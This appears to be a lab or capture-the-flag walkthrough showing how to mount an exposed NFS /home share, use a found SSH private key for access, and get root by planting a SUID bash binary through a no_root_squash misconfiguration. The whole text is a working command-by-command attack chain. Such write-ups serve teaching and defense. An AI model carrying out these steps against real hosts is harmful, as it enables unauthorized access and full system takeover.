Initial Access

Before we escalate privileges, we first need to get access to the target machine. Let’s begin by enumerating the NFS shares.

Step 1: Enumerate NFS Shares

First, we need to check if the NFS service is running on the target machine. NFS usually runs on port 2049, so we can scan for it using Nmap:

nmap -p 2049 <target-ip>

If the port is open, we can list the shared directories using the following command:

/usr/sbin/showmount -e <target-ip>

This will display the available shared directories. In our case, we discover that /home is shared.

Step 2: Mount the Shared Directory

To access the shared directory from our attacking machine, we first create a mount point:

mkdir /tmp/mount

Then, we mount the shared directory:

sudo mount -t nfs <target-ip>:/home /tmp/mount -nolock

Now, we can browse the shared files in /tmp/mount/.

Step 3: Searching for Sensitive Information

Once inside the shared directory, we look for files that could help us gain access to the target machine. Common things to check:

• SSH private keys
• User credentials
• Executable files with misconfigured permissions

In our case, we find an SSH private key, which can be used to access the system. To use the key, we modify its permissions and connect to the target machine:

chmod 600 <key-file>
ssh -i <key-file> <username>@<target-ip>

At this point, we have low-privilege shell access!

Privilege Escalation via NFS Misconfiguration

Now that we have a user shell, we need to escalate our privileges to root.

Step 1: Download Bash Executable

On our attacking machine, we copy the bash binary from the target machine to our local system using SCP:

scp -i <key-file> <username>@<target-ip>:/bin/bash ~/Downloads/bash

Step 2: Copy Bash to the Shared Directory

Next, we place the copied bash binary into the shared NFS directory:

cp ~/Downloads/bash /tmp/mount/

Step 3: Add SUID Bit to Bash

We set the SUID bit on the bash executable so that it will run with elevated privileges when executed:

sudo chmod +s /tmp/mount/bash

This step exploits the NFS misconfiguration where root squash is disabled. This means that any changes we make to files on the NFS share from our machine retain their permissions when accessed on the target machine.

Step 4: Log in to the Target Machine

We SSH back into the target machine:

ssh -i <key-file> <username>@<target-ip>

Once inside, we navigate to the mounted NFS directory and verify the permissions of our modified bash file:

ls -l /home/bash

We should see an s in the permissions, indicating that the SUID bit is set:

-rwsr-sr-x 1 root root 1183448 Feb  3 12:00 bash

Step 5: Execute Bash with Elevated Privileges

To gain root access, we simply execute the modified bash file with the -p flag to retain its permissions:

./bash -p

Boom! We now have a root shell.

whoami
root